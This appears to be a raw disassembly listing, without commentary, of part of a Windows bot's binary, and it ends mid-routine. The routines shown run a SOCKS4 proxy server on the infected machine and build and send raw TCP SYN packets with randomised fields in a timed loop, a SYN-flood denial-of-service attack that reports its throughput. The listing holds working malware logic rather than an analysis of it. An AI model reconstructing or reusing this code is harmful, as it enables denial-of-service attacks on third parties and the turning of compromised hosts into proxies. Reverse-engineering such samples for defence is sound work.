; =============== S U B R O U T I N E =======================================
sub_414664 proc near ; CODE XREF: sub_414684+A�p
; sub_41475C+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_418E70
push [esp+8+arg_4]
mov esi, eax
call sub_418E70
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_414664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414684 proc near ; CODE XREF: sub_414773+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_414664
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_4146A1
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4146A1: ; CODE XREF: sub_414684+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_418E70
push [ebp+arg_C]
mov esi, eax
call sub_418E70
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_4424F0, eax
lea eax, [edi+1]
mov dword_442511, eax
lea eax, [edi+17h]
mov dword_442509, eax
pop eax
push 74h
sub eax, edi
push offset dword_44248C
push ebx
mov dword_44251F, eax
call sub_418A00
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_418A00
add esi, 74h
push 5
push offset aGet_1 ; " get "
lea eax, [esi+ebx]
push eax
call sub_418A00
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_418A00
add esi, edi
push 10h
push 442505h
lea eax, [esi+ebx]
push eax
call sub_418A00
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_418A00
add esi, edi
push 38h
add esi, ebx
push offset byte_442515
push esi
call sub_418A00
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_414684 endp
; =============== S U B R O U T I N E =======================================
sub_41475C proc near ; CODE XREF: sub_414773+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_414664
push eax
call sub_4147E0
add esp, 0Ch
retn
sub_41475C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414773 proc near ; CODE XREF: sub_40119E+32�p
; .text:00401824�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_41475C
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_414793
cmp eax, 0FFFFh
jbe short loc_414797
loc_414793: ; CODE XREF: sub_414773+17�j
xor eax, eax
jmp short loc_4147DC
; ---------------------------------------------------------------------------
loc_414797: ; CODE XREF: sub_414773+1E�j
push esi
push edi
push ebx
call sub_414664
add eax, 101h
push eax
call sub_416A10
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_414664
pop ecx
pop ecx
push eax
push esi
call sub_414684
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4147FB
push esi
mov edi, eax
call sub_417480
add esp, 24h
mov eax, edi
pop esi
loc_4147DC: ; CODE XREF: sub_414773+22�j
pop edi
pop ebx
pop ebp
retn
sub_414773 endp
; =============== S U B R O U T I N E =======================================
sub_4147E0 proc near ; CODE XREF: sub_41475C+E�p
; sub_4147FB+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_4147E9
inc ecx
loc_4147E9: ; CODE XREF: sub_4147E0+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_4147E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147FB proc near ; CODE XREF: .text:00401849�p
; sub_414773+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_414817
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_414817
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_414817
cmp byte ptr [ebp+arg_C], 0
jnz short loc_41481A
loc_414817: ; CODE XREF: sub_4147FB+8�j
; sub_4147FB+E�j ...
inc [ebp+arg_C]
loc_41481A: ; CODE XREF: sub_4147FB+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_414842
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_41483B
cmp al, 0Dh
jz short loc_41483B
cmp al, 5Ch
jz short loc_41483B
test al, al
jnz short loc_414842
loc_41483B: ; CODE XREF: sub_4147FB+32�j
; sub_4147FB+36�j ...
add [ebp+arg_C], 100h
loc_414842: ; CODE XREF: sub_4147FB+28�j
; sub_4147FB+3E�j
push [ebp+arg_C]
call sub_4147E0
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_41485A
cmp eax, 0FFFFh
jbe short loc_414861
loc_41485A: ; CODE XREF: sub_4147FB+56�j
xor eax, eax
jmp loc_4148FF
; ---------------------------------------------------------------------------
loc_414861: ; CODE XREF: sub_4147FB+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_492010
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_414891
loc_414875: ; CODE XREF: sub_4147FB+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_414888
cmp al, 0Ah
jz short loc_414888
cmp al, 0Dh
jz short loc_414888
cmp al, 5Ch
jnz short loc_41488C
loc_414888: ; CODE XREF: sub_4147FB+7F�j
; sub_4147FB+83�j ...
inc bl
xor edx, edx
loc_41488C: ; CODE XREF: sub_4147FB+8B�j
inc edx
cmp edx, ecx
jb short loc_414875
loc_414891: ; CODE XREF: sub_4147FB+78�j
cmp ecx, esi
mov byte_492010, bl
ja short loc_4148BD
push 15h
push offset dword_442474
push [ebp+arg_0]
mov byte_442481, cl
mov byte_442485, bl
call sub_418A00
add esp, 0Ch
push 15h
jmp short loc_4148DE
; ---------------------------------------------------------------------------
loc_4148BD: ; CODE XREF: sub_4147FB+9E�j
push 17h
push offset dword_44245C
push [ebp+arg_0]
mov word_44246A, cx
mov byte_44246F, bl
call sub_418A00
add esp, 0Ch
push 17h
loc_4148DE: ; CODE XREF: sub_4147FB+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_4148FA
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_4148EC: ; CODE XREF: sub_4147FB+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_4148EC
loc_4148FA: ; CODE XREF: sub_4147FB+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_4148FF: ; CODE XREF: sub_4147FB+61�j
pop esi
leave
retn
sub_4147FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414902 proc near ; DATA XREF: sub_40C50A+5E83�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx
lea eax, [ebp+var_14]
push esi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call dword_44B6C0 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_44B740 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_44D064[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call dword_44B6EC ; bind
test eax, eax
jnz loc_414AA4
push 0Ah
push edi
call dword_44B6E8 ; listen
test eax, eax
jnz loc_414AA4
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset aSocks4Server_0 ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_418D70
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_4149DD
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40842D
add esp, 14h
loc_4149DD: ; CODE XREF: sub_414902+B9�j
; sub_414902+172�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_4035E1
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_44B754 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_4161EB
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_44D05C[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_414B07
push esi
push esi
call ds:dword_4942F4
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_44D06C[ecx], eax
jz short loc_414A84
loc_414A71: ; CODE XREF: sub_414902+180�j
cmp [ebp+var_28], esi
jnz loc_4149DD
push 5
call ds:dword_4942D8
jmp short loc_414A71
; ---------------------------------------------------------------------------
loc_414A84: ; CODE XREF: sub_414902+16D�j
call ds:dword_4942F0
push eax
lea eax, [ebp+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_418D70
add esp, 0Ch
jmp loc_4149DD
; ---------------------------------------------------------------------------
loc_414AA4: ; CODE XREF: sub_414902+7B�j
; sub_414902+8C�j
push edi
call dword_44B758 ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_414AE7
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_40842D
add esp, 14h
loc_414AE7: ; CODE XREF: sub_414902+1C3�j
lea eax, [ebp+var_2D4]
push eax
call sub_4035E1
push [ebp+var_3C]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_414902 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B07 proc near ; DATA XREF: sub_414902+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_44D064[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_44B6A8 ; select
test eax, eax
jnz short loc_414B88
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414B88: ; CODE XREF: sub_414B07+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_44B6D8 ; recv
test eax, eax
jg short loc_414BB9
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414BB9: ; CODE XREF: sub_414B07+98�j
cmp [ebp+var_4D0], 4
jnz loc_414DB3
cmp [ebp+var_4CF], 1
jnz loc_414DB3
cmp [ebp+var_44], bl
jz short loc_414C4F
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_414C4F
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_403655
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_4189A0
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_44B710 ; send
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414C4F: ; CODE XREF: sub_414B07+CF�j
; sub_414B07+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_4189A0
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_414CE7
call dword_44B654 ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
call sub_403655
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_4189A0
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_44B710 ; send
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414CE7: ; CODE XREF: sub_414B07+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_414D56
call dword_44B654 ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
call sub_403655
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_4189A0
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_44B710 ; send
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414D56: ; CODE XREF: sub_414B07+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_44B710 ; send
push dword ptr [esi]
push edi
call sub_414DCB
pop ecx
pop ecx
push edi
call dword_44B758 ; closesocket
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
loc_414DB3: ; CODE XREF: sub_414B07+B9�j
; sub_414B07+C6�j
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
sub_414B07 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DCB proc near ; CODE XREF: sub_414B07+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_414DE1: ; CODE XREF: sub_414DCB+C5�j
; sub_414DCB+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_414DF9: ; CODE XREF: sub_414DCB+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_414E09
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_414DF9
loc_414E09: ; CODE XREF: sub_414DCB+33�j
cmp ecx, 1
jnz short loc_414E1E
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_414E1E: ; CODE XREF: sub_414DCB+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_44B6A8 ; select
loc_414E40: ; DATA XREF: .data:004438EC�o
lea eax, [ebp+var_104]
push eax
push ebx
call dword_44B5B8 ; __WSAFDIsSet
test eax, eax
jz short loc_414E7E
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_44B6D8 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_414EC6
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_414EC6
loc_414E7E: ; CODE XREF: sub_414DCB+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_44B5B8 ; __WSAFDIsSet
test eax, eax
jz loc_414DE1
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_44B6D8 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_414EC6
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz loc_414DE1
loc_414EC6: ; CODE XREF: sub_414DCB+9A�j
; sub_414DCB+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_414DCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414ECB proc near ; DATA XREF: sub_40C50A+390D�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_415219
push eax
lea eax, [ebp+var_414]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax
call sub_418D70
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_414F48
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40842D
add esp, 14h
loc_414F48: ; CODE XREF: sub_414ECB+5B�j
lea eax, [ebp+var_414]
push eax
call sub_4035E1
push [ebp+var_10]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
sub_414ECB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F67 proc near ; CODE XREF: sub_415219+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_44B638 ; WSAStartup
test eax, eax
jz short loc_414FA7
xor eax, eax
jmp loc_415215
; ---------------------------------------------------------------------------
loc_414FA7: ; CODE XREF: sub_414F67+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_44B764 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_41520D
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_44B6A0 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_415203
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call dword_44B6C0 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_44B6C0 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_44B6C0 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_44B6C0 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_494328
lea eax, [ebp+var_8]
push eax
call ds:dword_494324
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_41A2F0
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_415092: ; CODE XREF: sub_414F67+25D�j
; sub_414F67+26B�j
mov [ebp+var_24], bx
call sub_419000
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_44B6C0 ; htons
mov [ebp+var_34], ax
call sub_419000
mov edi, eax
shl edi, 10h
call sub_419000
or edi, eax
push edi
call dword_44B6C0 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_44B6BC ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_44B6C0 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_418A00
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B045
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_418A00
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_4189A0
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B045
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_44B724 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4151D7
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_494324
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_415200
jl loc_415092
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_415200
jmp loc_415092
; ---------------------------------------------------------------------------
loc_4151D7: ; CODE XREF: sub_414F67+247�j
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax
call sub_418D70
lea eax, [ebp+var_F4]
push eax
call sub_4035E1
add esp, 10h
jmp short loc_415203
; ---------------------------------------------------------------------------
loc_415200: ; CODE XREF: sub_414F67+25B�j
; sub_414F67+269�j
mov ebx, [ebp+arg_8]
loc_415203: ; CODE XREF: sub_414F67+78�j
; sub_414F67+297�j
push [ebp+var_C]
call dword_44B758 ; closesocket
pop esi
loc_41520D: ; CODE XREF: sub_414F67+5B�j
call dword_44B620 ; WSACleanup
mov eax, ebx
loc_415215: ; CODE XREF: sub_414F67+3B�j
pop edi
pop ebx
leave
retn
sub_414F67 endp
; =============== S U B R O U T I N E =======================================
sub_415219 proc near ; CODE XREF: sub_414ECB+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AED0
push [esp+10h+arg_4]
mov esi, eax
call sub_4195F0
push [esp+14h+arg_8]
mov ebx, eax
call sub_4195F0
mov edi, eax
call sub_419000
cdq
loc_415243: ; DATA XREF: .data:004437B8�o
; .data:004437C0�o
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_414F67
add esp, 1Ch
test eax, eax
jnz short loc_415264
push 1
pop eax
loc_415264: ; CODE XREF: sub_415219+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_415219 endp
; =============== S U B R O U T I N E =======================================
sub_415273 proc near ; CODE XREF: sub_402853+74�p
; sub_40C50A+5819�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_494308
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_492018
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_418EF0
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_415273 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152DC proc near ; CODE XREF: sub_405C86+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4943F4
test eax, eax
jz short loc_41536F
cmp [ebp+var_90], 4
jnz short loc_415345
cmp [ebp+var_8C], esi
jnz short loc_41532D
cmp [ebp+var_84], 1
jnz short loc_415320
push 1
pop esi
loc_415320: ; CODE XREF: sub_4152DC+3F�j
cmp [ebp+var_84], 2
jnz short loc_41536F
push 1
jmp short loc_41536E
; ---------------------------------------------------------------------------
loc_41532D: ; CODE XREF: sub_4152DC+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41533A
loc_415336: ; CODE XREF: sub_4152DC:loc_415354�j
push 2
jmp short loc_41536E
; ---------------------------------------------------------------------------
loc_41533A: ; CODE XREF: sub_4152DC+58�j
